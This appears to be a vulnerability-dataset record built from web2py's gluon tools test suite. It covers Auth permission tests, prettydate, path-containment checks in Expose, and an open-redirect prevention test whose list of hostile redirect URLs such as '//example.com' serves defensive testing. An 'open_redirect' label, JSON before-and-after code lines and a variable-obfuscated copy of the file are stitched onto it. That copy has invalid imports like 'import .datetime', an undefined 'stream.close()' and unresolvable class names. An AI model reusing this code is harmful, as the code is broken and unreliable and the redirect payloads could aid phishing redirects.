        self.assertEqual(set(self.db.auth_membership(membership_id).as_dict().items()),
                         set({'group_id': 2, 'user_id': 1, 'id': 2}.items())) # is not deleted
        # deleted once the target user is named explicitly
        bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.assertTrue(self.auth.del_membership('some_test_group', user_id=bart_id))
        self.assertEqual(self.db.auth_membership(membership_id), None) # is really deleted
    def test_has_permission(self):
        """has_permission() is True only for a permission name previously
        granted to the group on the given table/record."""
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        bart_id = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
        self.auth.add_permission(group_id=self.auth.id_group('user_1'),
                                 name='some_permission',
                                 table_name='auth_user',
                                 record_id=0,
                                 )
        # True case: exactly the granted permission
        self.assertTrue(self.auth.has_permission(name='some_permission',
                                                 table_name='auth_user',
                                                 record_id=0,
                                                 user_id=bart_id,
                                                 group_id=self.auth.id_group('user_1')))
        # False case: a name that was never granted
        self.assertFalse(self.auth.has_permission(name='some_other_permission',
                                                  table_name='auth_user',
                                                  record_id=0,
                                                  user_id=bart_id,
                                                  group_id=self.auth.id_group('user_1')))
    def test_add_permission(self):
        """add_permission() inserts an auth_permission row and returns its id;
        group_id=0 targets the logged-in user's personal group."""
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        permission_id = \
            self.auth.add_permission(group_id=self.auth.id_group('user_1'),
                                     name='some_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        # NOTE(review): counts are asserted EQUAL, so add_permission() writes
        # no auth_event row here; the original comment claimed the opposite.
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
        # True case: the permission row exists
        permission_count = \
            self.db(self.db.auth_permission.id == permission_id).count()
        self.assertTrue(permission_count)
        # False case: a never-granted permission matches nothing
        permission_count = \
            self.db((self.db.auth_permission.group_id == self.auth.id_group('user_1')) &
                    (self.db.auth_permission.name == 'no_permission') &
                    (self.db.auth_permission.table_name == 'no_table') &
                    (self.db.auth_permission.record_id == 0)).count()
        self.assertFalse(permission_count)
        # corner case: group_id=0 resolves to the logged-in user's group
        self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
        permission_id = \
            self.auth.add_permission(group_id=0,
                                     name='user_1_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        permission_name = \
            self.db(self.db.auth_permission.id == permission_id).select(self.db.auth_permission.name).first().name
        self.assertEqual(permission_name, 'user_1_permission')
        # add an existing permission: still returns a truthy id
        permission_id =\
            self.auth.add_permission(group_id=0,
                                     name='user_1_permission',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        self.assertTrue(permission_id)
    def test_del_permission(self):
        """del_permission() removes the auth_permission row and returns truthy."""
        permission_id = \
            self.auth.add_permission(group_id=self.auth.id_group('user_1'),
                                     name='del_permission_test',
                                     table_name='auth_user',
                                     record_id=0,
                                     )
        count_log_event_test_before = self.db(self.db.auth_event.id > 0).count()
        self.assertTrue(self.auth.del_permission(group_id=self.auth.id_group('user_1'),
                                                 name='del_permission_test',
                                                 table_name='auth_user',
                                                 record_id=0,))
        count_log_event_test_after = self.db(self.db.auth_event.id > 0).count()
        # NOTE(review): counts are asserted EQUAL, so del_permission() writes
        # no auth_event row here; the original comment claimed the opposite.
        self.assertEqual(count_log_event_test_after, count_log_event_test_before)
        # really deleted: the row no longer matches
        permission_count = \
            self.db(self.db.auth_permission.id == permission_id).count()
        self.assertFalse(permission_count)
# TODO: def test_accessible_query(self):
# TODO: def test_archive(self):
# TODO: def test_wiki(self):
# TODO: def test_wikimenu(self):
# End Auth test
# TODO: class TestCrud(unittest.TestCase):
# It deprecated so far from a priority
# TODO: class TestService(unittest.TestCase):
# TODO: class TestPluginManager(unittest.TestCase):
# TODO: class TestWiki(unittest.TestCase):
# TODO: class TestConfig(unittest.TestCase):
class TestToolsFunctions(unittest.TestCase):
    """
    Test suite for all the tools.py functions
    """
    def test_prettydate(self):
        """prettydate() must humanize past deltas, date objects, future
        deltas, UTC datetimes, and missing/invalid input."""
        now = datetime.datetime.now()
        self.assertEqual(prettydate(d=now), 'now')
        # past datetimes: (timedelta kwargs, expected label)
        past_cases = [
            (dict(seconds=1), '1 second ago'),
            (dict(seconds=2), '2 seconds ago'),
            (dict(seconds=60), '1 minute ago'),
            (dict(seconds=61), '1 minute ago'),
            (dict(seconds=120), '2 minutes ago'),
            (dict(seconds=121), '2 minutes ago'),
            (dict(seconds=60 * 60), '1 hour ago'),
            (dict(seconds=3601), '1 hour ago'),
            (dict(seconds=2 * 60 * 60), '2 hours ago'),
            (dict(seconds=2 * 60 * 60 + 1), '2 hours ago'),
            (dict(days=1), '1 day ago'),
            (dict(days=2), '2 days ago'),
            (dict(days=7), '1 week ago'),
            (dict(days=8), '1 week ago'),
            (dict(days=14), '2 weeks ago'),
            (dict(days=15), '2 weeks ago'),
            (dict(days=21), '3 weeks ago'),
            (dict(days=27), '1 month ago'),
            (dict(days=28), '1 month ago'),
            (dict(days=60), '2 months ago'),
            (dict(days=90), '3 months ago'),
            (dict(days=365), '1 year ago'),
            (dict(days=366), '1 year ago'),
            (dict(days=2 * 365), '2 years ago'),
            (dict(days=2 * 365 + 1), '2 years ago'),
        ]
        for delta_kwargs, expected in past_cases:
            self.assertEqual(prettydate(d=now - datetime.timedelta(**delta_kwargs)), expected)
        # date() inputs
        self.assertEqual(prettydate(d=now.date()), 'now')
        self.assertEqual(prettydate(d=now.date() - datetime.timedelta(days=1)), '1 day ago')
        self.assertEqual(prettydate(d=now.date() - datetime.timedelta(days=2)), '2 days ago')
        # from now
        # from now is picky depending of the execution time, so we can't use sharp value like 1 second or 1 day
        future_cases = [
            (dict(seconds=-65), '1 minute from now'),
            (dict(hours=-23.5), '23 hours from now'),
            (dict(days=-366), '1 year from now'),
        ]
        for delta_kwargs, expected in future_cases:
            self.assertEqual(prettydate(d=now - datetime.timedelta(**delta_kwargs)), expected)
        # utc=True compares against the current UTC time
        utcnow = datetime.datetime.utcnow()
        self.assertEqual(prettydate(d=utcnow, utc=True), 'now')
        self.assertEqual(prettydate(d=utcnow - datetime.timedelta(seconds=1), utc=True), '1 second ago')
        # not d or invalid date
        self.assertEqual(prettydate(d=None), '')
        self.assertEqual(prettydate(d='invalid_date'), '[invalid date]')
# Shorthand used by the filesystem fixtures below.
pjoin = os.path.join
def have_symlinks():
    """Return True when the platform can create symlinks (POSIX only here)."""
    return os.name == 'posix'
class Test_Expose__in_base(unittest.TestCase):
    """Unit tests for Expose.__in_base(), the path-containment check."""

    def test_in_base(self):
        # every (subdir, basedir) pair here is a genuine containment
        contained = (
            ('/foo/bar', '/foo'),
            ('/foo', '/foo'),
            ('/foo', '/'),
            ('/', '/'),
        )
        for subdir, basedir in contained:
            self.assertTrue(Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                            '%s is not under %s' % (subdir, basedir))

    def test_not_in_base(self):
        # prefix tricks, reversed order and escapes must all be rejected
        not_contained = (
            ('/foobar', '/foo'),
            ('/foo', '/foo/bar'),
            ('/bar', '/foo'),
            ('/foo/bar', '/bar'),
            ('/', '/x'),
        )
        for subdir, basedir in not_contained:
            self.assertFalse(Expose._Expose__in_base(subdir=subdir, basedir=basedir, sep='/'),
                             '%s should not be under %s' % (subdir, basedir))
class TestExpose(unittest.TestCase):
    """Integration tests for Expose against a real temporary directory tree,
    including symlinks that point both inside and outside the exposed base."""

    def setUp(self):
        # Build the scratch tree shown in the diagram below.
        self.base_dir = tempfile.mkdtemp()
        self.make_dirs()
        self.touch_files()
        self.make_readme()
        if have_symlinks():
            self.make_symlinks()
        # $BASE/
        # |-- inside/
        # |   |-- dir1/
        # |   |   |-- file1
        # |   |   `-- file2
        # |   |-- dir2/
        # |   |   |-- link_to_dir1/@ -> $BASE/inside/dir1/
        # |   |   `-- link_to_file1@ -> $BASE/inside/dir1/file1
        # |   |-- link_to_outside/@ -> $BASE/outside/
        # |   |-- link_to_file3@ -> $BASE/outside/file3
        # |   `-- README
        # `-- outside/
        #     `-- file3
        self.set_expectations()
        # Patch tools.URL so rendered links are deterministic in assertions.
        tools.URL = lambda args: URL(a='a', c='c', f='f', args=args)

    def tearDown(self):
        # Restore the patched URL helper and remove the scratch tree.
        tools.URL = URL
        shutil.rmtree(self.base_dir)

    def make_dirs(self):
        """setup directory structure"""
        for d in (['inside'],
                  ['inside', 'dir1'],
                  ['inside', 'dir2'],
                  ['outside']):
            os.mkdir(pjoin(self.base_dir, *d))

    def touch_files(self):
        """create some files"""
        for f in (['inside', 'dir1', 'file1'],
                  ['inside', 'dir1', 'file2'],
                  ['outside', 'file3']):
            with open(pjoin(self.base_dir, *f), 'a'):
                pass

    def make_readme(self):
        """Create inside/README with known content."""
        with open(pjoin(self.base_dir, 'inside', 'README'), 'w') as f:
            f.write('README content')

    def make_symlinks(self):
        """setup extension for posix systems"""
        # inside links
        os.symlink(
            pjoin(self.base_dir, 'inside', 'dir1'),
            pjoin(self.base_dir, 'inside', 'dir2', 'link_to_dir1'))
        os.symlink(
            pjoin(self.base_dir, 'inside', 'dir1', 'file1'),
            pjoin(self.base_dir, 'inside', 'dir2', 'link_to_file1'))
        # outside links
        os.symlink(
            pjoin(self.base_dir, 'outside'),
            pjoin(self.base_dir, 'inside', 'link_to_outside'))
        os.symlink(
            pjoin(self.base_dir, 'outside', 'file3'),
            pjoin(self.base_dir, 'inside', 'link_to_file3'))

    def set_expectations(self):
        """Precompute the HTML fragments Expose is expected to render."""
        url = lambda args: URL('a', 'c', 'f', args=args)
        self.expected_folders = {}
        self.expected_folders['inside'] = SPAN(H3('Folders'), TABLE(
            TR(TD(A('dir1', _href=url(args=['dir1'])))),
            TR(TD(A('dir2', _href=url(args=['dir2'])))),
            _class='table',
        ))
        self.expected_folders[pjoin('inside', 'dir1')] = ''
        if have_symlinks():
            self.expected_folders[pjoin('inside', 'dir2')] = SPAN(H3('Folders'), TABLE(
                TR(TD(A('link_to_dir1', _href=url(args=['dir2', 'link_to_dir1'])))),
                _class='table',
            ))
        else:
            self.expected_folders[pjoin('inside', 'dir2')] = ''
        self.expected_files = {}
        self.expected_files['inside'] = SPAN(H3('Files'), TABLE(
            TR(TD(A('README', _href=url(args=['README']))), TD('')),
            _class='table',
        ))
        self.expected_files[pjoin('inside', 'dir1')] = SPAN(H3('Files'), TABLE(
            TR(TD(A('file1', _href=url(args=['dir1', 'file1']))), TD('')),
            TR(TD(A('file2', _href=url(args=['dir1', 'file2']))), TD('')),
            _class='table',
        ))
        if have_symlinks():
            self.expected_files[pjoin('inside', 'dir2')] = SPAN(H3('Files'), TABLE(
                TR(TD(A('link_to_file1', _href=url(args=['dir2', 'link_to_file1']))), TD('')),
                _class='table',
            ))
        else:
            self.expected_files[pjoin('inside', 'dir2')] = ''

    def make_expose(self, base, show='', follow_symlink_out=False):
        """Build an Expose for *base*, simulating a request for *show*."""
        current.request = Request(env={})
        current.request.raw_args = show
        current.request.args = show.split('/')
        return Expose(base=pjoin(self.base_dir, base),
                      basename=base,
                      follow_symlink_out=follow_symlink_out)

    def test_expose_inside_state(self):
        expose = self.make_expose(base='inside', show='')
        self.assertEqual(expose.args, [])
        self.assertEqual(expose.folders, ['dir1', 'dir2'])
        self.assertEqual(expose.filenames, ['README'])

    @unittest.skipUnless(have_symlinks(), 'requires symlinks')
    def test_expose_inside_state_floow_symlink_out(self):
        # NOTE(review): "floow" is a typo for "follow"; kept to avoid renaming a test.
        expose = self.make_expose(base='inside', show='',
                                  follow_symlink_out=True)
        self.assertEqual(expose.args, [])
        self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
        self.assertEqual(expose.filenames, ['README', 'link_to_file3'])

    def test_expose_inside_dir1_state(self):
        expose = self.make_expose(base='inside', show='dir1')
        self.assertEqual(expose.args, ['dir1'])
        self.assertEqual(expose.folders, [])
        self.assertEqual(expose.filenames, ['file1', 'file2'])

    def test_expose_inside_dir2_state(self):
        expose = self.make_expose(base='inside', show='dir2')
        self.assertEqual(expose.args, ['dir2'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['link_to_dir1'])
            self.assertEqual(expose.filenames, ['link_to_file1'])
        else:
            self.assertEqual(expose.folders, [])
            self.assertEqual(expose.filenames, [])

    def test_expose_base_inside_state(self):
        expose = self.make_expose(base='', show='inside')
        self.assertEqual(expose.args, ['inside'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['dir1', 'dir2', 'link_to_outside'])
            self.assertEqual(expose.filenames, ['README', 'link_to_file3'])
        else:
            self.assertEqual(expose.folders, ['dir1', 'dir2'])
            self.assertEqual(expose.filenames, ['README'])

    def test_expose_base_inside_dir2_state(self):
        expose = self.make_expose(base='', show='inside/dir2')
        self.assertEqual(expose.args, ['inside', 'dir2'])
        if have_symlinks():
            self.assertEqual(expose.folders, ['link_to_dir1'])
            self.assertEqual(expose.filenames, ['link_to_file1'])
        else:
            self.assertEqual(expose.folders, [])
            self.assertEqual(expose.filenames, [])

    def assertSameXML(self, a, b):
        """Compare two fragments by their rendered XML (accepts str or helper)."""
        self.assertEqual(a if isinstance(a, str) else a.xml(),
                         b if isinstance(b, str) else b.xml())

    def run_test_xml_for(self, base, show):
        """Assert that Expose renders the precomputed file/folder tables.

        Fixed: removed an unused ``request = Request(env={})`` local that
        shadowed nothing and was never read.
        """
        expose = self.make_expose(base, show)
        path = pjoin(base, show).rstrip(os.path.sep)
        self.assertSameXML(expose.table_files(), self.expected_files[path])
        self.assertSameXML(expose.table_folders(), self.expected_folders[path])

    def test_xml_inside(self):
        self.run_test_xml_for(base='inside', show='')

    def test_xml_dir1(self):
        self.run_test_xml_for(base='inside', show='dir1')

    def test_xml_dir2(self):
        self.run_test_xml_for(base='inside', show='dir2')

    def test_file_not_found(self):
        with self.assertRaises(HTTP):
            self.make_expose(base='inside', show='dir1/file_not_found')

    def test_not_authorized(self):
        with self.assertRaises(HTTP):
            self.make_expose(base='inside', show='link_to_file3')
class Test_OpenRedirectPrevention(unittest.TestCase):
def test_open_redirect(self):
bad_urls = [
"/",
"//",
"~/",
"//example.com",
"/\example.com"
"~/example.com"
"//example.com/a/b/c",
"//example.com/a/b/c",
"~/example.com/a/b/c"
]
good_urls = [
"a/b/c",
"/a",
"/a/b",
"/a/b/c",
]
prefixes = ["", ":", "http:", "https:", "ftp:"]
for prefix in prefixes:
for url in bad_urls:
self.assertEqual(prevent_open_redirect(prefix + url), None)
for prefix in prefixes:
for url in good_urls:
self.assertEqual(prevent_open_redirect(prefix + url), prefix + url)
| open_redirect | {
"code": [
"from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose"
],
"line_no": [
20
]
} | {
"code": [
"from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose, prevent_open_redirect",
"class Test_OpenRedirectPrevention(unittest.TestCase):",
" def test_open_redirect(self):",
" bad_urls = [",
" \"/\",",
" \"//\",",
" \"~/\",",
" \"//example.com\",",
" \"/\\example.com\"",
" \"~/example.com\"",
" \"//example.com/a/b/c\",",
" \"//example.com/a/b/c\",",
" \"~/example.com/a/b/c\"",
" ]",
" good_urls = [",
" \"a/b/c\",",
" \"/a\",",
" \"/a/b\",",
" \"/a/b/c\",",
" ]",
" prefixes = [\"\", \":\", \"http:\", \"https:\", \"ftp:\"]",
" for prefix in prefixes:",
" for url in bad_urls:",
" self.assertEqual(prevent_open_redirect(prefix + url), None)",
" for prefix in prefixes:",
" for url in good_urls:",
" self.assertEqual(prevent_open_redirect(prefix + url), prefix + url)"
],
"line_no": [
20,
1385,
1387,
1388,
1389,
1390,
1391,
1392,
1393,
1394,
1395,
1396,
1397,
1398,
1399,
1400,
1401,
1402,
1403,
1404,
1405,
1406,
1407,
1408,
1409,
1410,
1411
]
} |
import os
import sys
import shutil
import tempfile
import smtplib
import .datetime
import unittest
VAR_0 = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import .Table
from gluon import .tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import .TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
VAR_1 = "imap" in VAR_0
class VAR_23(unittest.TestCase):
class CLASS_6(object):
def __init__(self, VAR_10, VAR_11, VAR_12):
self.sender = VAR_10
self.to = VAR_11
self.payload = VAR_12
self._parsed_payload = None
@property
def FUNC_63(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class CLASS_7(object):
VAR_13 = []
VAR_14 = {}
def __init__(self, VAR_15, VAR_16, **VAR_4):
self.address = VAR_15
self.port = VAR_16
self.has_quit = False
self.tls = False
def FUNC_64(self, VAR_17, VAR_18):
if VAR_17 not in self.users or self.users[VAR_17] != VAR_18:
raise smtplib.SMTPAuthenticationError
self.username = VAR_17
self.password = VAR_18
def FUNC_65(self, VAR_10, VAR_11, VAR_12):
self.inbox.append(VAR_23.Message(VAR_10, VAR_11, VAR_12))
def FUNC_66(self):
self.has_quit = True
def FUNC_67(self, VAR_19=None):
pass
def FUNC_68(self):
self.tls = True
def FUNC_1(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = VAR_23.DummySMTP
smtplib.SMTP_SSL = VAR_23.DummySMTP
def FUNC_2(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def FUNC_3(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertEqual(VAR_21.sender, VAR_20.settings.sender)
self.assertEqual(VAR_21.to, ['somebody@example.com'])
VAR_22 = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(VAR_22 in VAR_21.payload)
self.assertTrue(VAR_21.payload.endswith('world'))
def FUNC_4(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertFalse(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
def FUNC_5(self):
VAR_23.DummySMTP.users['username'] = 'password'
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.login = 'username:password'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
del VAR_23.DummySMTP.users['username']
VAR_23.DummySMTP.inbox.pop()
def FUNC_6(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='<html><head></head><body></body></html>'))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in VAR_21.payload)
def FUNC_7(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
VAR_21=('Text only', '<html><pre>HTML Only</pre></html>')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue(VAR_21.parsed_payload.is_multipart())
self.assertTrue(VAR_21.parsed_payload.get_content_type() == 'multipart/alternative')
VAR_24 = VAR_21.parsed_payload.get_payload()
self.assertTrue('Text only' in VAR_24[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in VAR_24[1].as_string())
def FUNC_8(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.ssl = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_9(self):
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
VAR_20.settings.tls = True
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
reply_to='us@example.com',
VAR_21='world'))
VAR_23.DummySMTP.inbox.pop()
def FUNC_10(self):
VAR_25 = os.path.abspath(__file__)
VAR_20 = Mail()
VAR_20.settings.server = 'smtp.example.com:25'
VAR_20.settings.sender = 'you@example.com'
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25)))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
VAR_26 = VAR_21.parsed_payload.get_payload(1).get_payload(decode=True)
with open(VAR_25, 'rb') as mf:
self.assertEqual(to_bytes(VAR_26), to_bytes(mf.read()))
VAR_27 = open(VAR_25)
self.assertRaises(Exception, lambda *VAR_3, **VAR_4: Mail.Attachment(*VAR_3, **VAR_4), VAR_27)
stream.close()
self.assertTrue(VAR_20.send(VAR_11=['somebody@example.com'],
subject='hello',
VAR_21='world',
attachments=Mail.Attachment(VAR_25, content_id='trololo', content_type='tra/lala')))
VAR_21 = VAR_23.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: tra/lala' in VAR_21.payload)
self.assertTrue('Content-Id: <trololo>' in VAR_21.payload)
class CLASS_1(unittest.TestCase):
def FUNC_1(self):
from gluon.tools import AuthJWT
from gluon import current
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.current = current
self.current.request = self.request
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.user_data = dict(VAR_17='jwtuser', VAR_18='jwtuser123')
self.db.auth_user.insert(VAR_17=self.user_data['username'],
VAR_18=str(
self.db.auth_user.password.requires[0](
self.user_data['password'])[0]))
self.jwtauth = AuthJWT(self.auth, secret_key='secret', verify_expiration=True)
def FUNC_11(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
def FUNC_12(self):
import gluon.serializers
self.request.vars.update(self.user_data)
self.token = self.jwtauth.jwt_token_manager()
self.assertIsNotNone(self.token)
del self.request.vars['username']
del self.request.vars['password']
self.token = self.jwtauth.jwt_token_manager()
self.request.vars._token = gluon.serializers.json_parser.loads(self.token)['token']
@self.jwtauth.allows_jwt()
def FUNC_69():
self.assertEqual(self.user_data['username'], self.auth.user.username)
FUNC_69()
@unittest.skipIf(VAR_1, "TODO: Imap raises 'Connection refused'")
class CLASS_2(unittest.TestCase):
def FUNC_13(self, *VAR_3, **VAR_4):
if PY2:
return getattr(self, 'assertRaisesRegexp')(*VAR_3, **VAR_4)
return getattr(self, 'assertRaisesRegex')(*VAR_3, **VAR_4)
def FUNC_1(self):
self.request = Request(env={})
self.request.application = 'a'
self.request.controller = 'c'
self.request.function = 'f'
self.request.folder = 'applications/admin'
self.response = Response()
self.session = Session()
VAR_28 = TranslatorFactory('', 'en')
self.session.connect(self.request, self.response)
from gluon.globals import current
self.current = current
self.current.request = self.request
self.current.response = self.response
self.current.session = self.session
self.current.T = VAR_28
self.db = DAL(VAR_0, check_reserved=['all'])
self.auth = Auth(self.db)
self.auth.define_tables(VAR_17=True, signature=False)
self.db.define_table('t0', Field('tt'), self.auth.signature)
self.auth.enable_record_versioning(self.db)
self.auth.settings.registration_requires_verification = False
self.auth.settings.registration_requires_approval = False
self.auth.register_bare(first_name='Bart',
last_name='Simpson',
VAR_17='bart',
email='bart@simpson.com',
VAR_18='bart_password')
def FUNC_14(self):
self.assertTrue('auth_user' in self.db)
self.assertTrue('auth_group' in self.db)
self.assertTrue('auth_membership' in self.db)
self.assertTrue('auth_permission' in self.db)
self.assertTrue('auth_event' in self.db)
VAR_29 = self.db(self.db.auth_user.username == 'bart').select().first()
self.assertEqual(VAR_29['username'], 'bart')
self.assertEqual(VAR_29['registration_key'], '')
VAR_30 = self.db(self.db.auth_user.username == 'bart').select().first().id
VAR_31 = self.db(self.db.auth_group.role == 'user_{0}'.format(VAR_30)).select().first().id
self.assertTrue(self.db((self.db.auth_membership.group_id == VAR_31) &
(self.db.auth_membership.user_id == VAR_30)).select().first())
def FUNC_15(self):
for f in ['login', 'retrieve_password', 'retrieve_username', 'register']:
VAR_89 = getattr(self.auth, f)().xml()
self.assertTrue(b'name="_formkey"' in VAR_89)
for f in ['logout', 'verify_email', 'reset_password', 'change_password', 'profile', 'groups']:
self.myassertRaisesRegex(HTTP, "303*", getattr(self.auth, f))
self.myassertRaisesRegex(HTTP, "401*", self.auth.impersonate)
try:
for t in ['t0_archive', 't0', 'auth_cas', 'auth_event',
'auth_membership', 'auth_permission', 'auth_group',
'auth_user']:
self.db[t].drop()
except SyntaxError as e:
pass
return
def FUNC_16(self):
self.current.request.vars._next = 'next_test'
self.assertEqual(self.auth.get_vars_next(), 'next_test')
def FUNC_17(self):
self.assertTrue('t0_archive' in self.db)
def FUNC_18(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_30 = self.db(self.db.auth_user.username == 'bart').select(self.db.auth_user.id).first().id
self.auth.log_event(description='some_log_event_description_%(var1)s',
vars={"var1": "var1"},
origin='log_event_test_1')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_1'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_1',
'client_ip': None,
'user_id': VAR_30,
'description': 'some_log_event_description_var1'}.items()))
self.auth.logout_bare()
self.auth.log_event(description='some_log_event_description_%(var2)s',
vars={"var2": "var2"},
origin='log_event_test_2')
VAR_32 = self.db(self.db.auth_event.origin == 'log_event_test_2'
).select(*[self.db.auth_event[f]
for f in self.db.auth_event.fields if f not in ('id', 'time_stamp')]).first().as_dict()
self.assertEqual(set(VAR_32.items()), set({'origin': 'log_event_test_2',
'client_ip': None,
'user_id': None,
'description': 'some_log_event_description_var2'}.items()))
self.auth.settings.logging_enabled = False
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description='some_log_event_description_%(var3)s',
vars={"var3": "var3"},
origin='log_event_test_3')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
self.auth.settings.logging_enabled = True
VAR_33 = self.db(self.db.auth_event.id > 0).count()
self.auth.log_event(description=None,
vars={"var4": "var4"},
origin='log_event_test_4')
VAR_34 = self.db(self.db.auth_event.id > 0).count()
self.assertEqual(VAR_34, VAR_33)
def FUNC_19(self):
self.db.auth_user.insert(email='user1@test.com', VAR_17='user1', VAR_18='password_123')
self.db.commit()
self.assertEqual(self.auth.get_or_create_user({'email': 'user1@test.com',
'username': 'user1',
'password': 'password_123'
})['username'], 'user1')
self.assertEqual(self.auth.get_or_create_user({'email': 'user2@test.com',
'username': 'user2'})['username'], 'user2')
self.assertEqual(self.auth.get_or_create_user({'first_name': 'Omer',
'last_name': 'Simpson',
'email': 'user3@test.com',
'registration_id': 'user3',
'username': 'user3'})['username'], 'user3')
self.assertEqual(self.auth.get_or_create_user({'email': ''}), None)
self.db.auth_user.truncate()
self.db.commit()
def FUNC_20(self):
self.auth.login_bare(VAR_17='bart', VAR_18='bart_password')
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.login_bare(VAR_17='bart', VAR_18='wrong_password'))
def FUNC_21(self):
self.assertRaises(ValueError, self.auth.register_bare)
self.assertEqual(self.auth.register_bare(VAR_17='bart', VAR_18='wrong_password'), False)
self.assertEqual(self.auth.register_bare(VAR_17='user2',
email='user2@test.com',
VAR_18='password_123')['username'], 'user2')
self.assertRaises(ValueError, self.auth.register_bare,
**dict(wrong_field_name='user3', VAR_18='password_123'))
self.assertRaises(ValueError, self.auth.register_bare,
**dict(email='user4@', VAR_18='password_123'))
self.db.auth_user.truncate()
self.db.commit()
def FUNC_22(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.assertTrue(self.auth.is_logged_in())
self.auth.logout_bare()
self.assertFalse(self.auth.is_logged_in())
def FUNC_23(self):
self.auth.user = 'logged_in'
self.assertTrue(self.auth.is_logged_in())
self.auth.user = None
self.assertFalse(self.auth.is_logged_in())
def FUNC_24(self):
self.assertTrue(self.auth.random_password())
def FUNC_25(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
self.auth.settings.bulk_register_enabled = True
VAR_35 = self.auth.bulk_register(max_emails=10).xml()
self.assertTrue(b'name="_formkey"' in VAR_35)
def FUNC_26(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_36 = getattr(self.auth, 'change_password')().xml()
self.assertTrue(b'name="_formkey"' in VAR_36)
def FUNC_27(self):
self.auth.login_user(self.db(self.db.auth_user.username == 'bart').select().first()) # bypass login_bare()
VAR_37 = getattr(self.auth, 'profile')().xml()
self.assertTrue(b'name="_formkey"' in VAR_37)
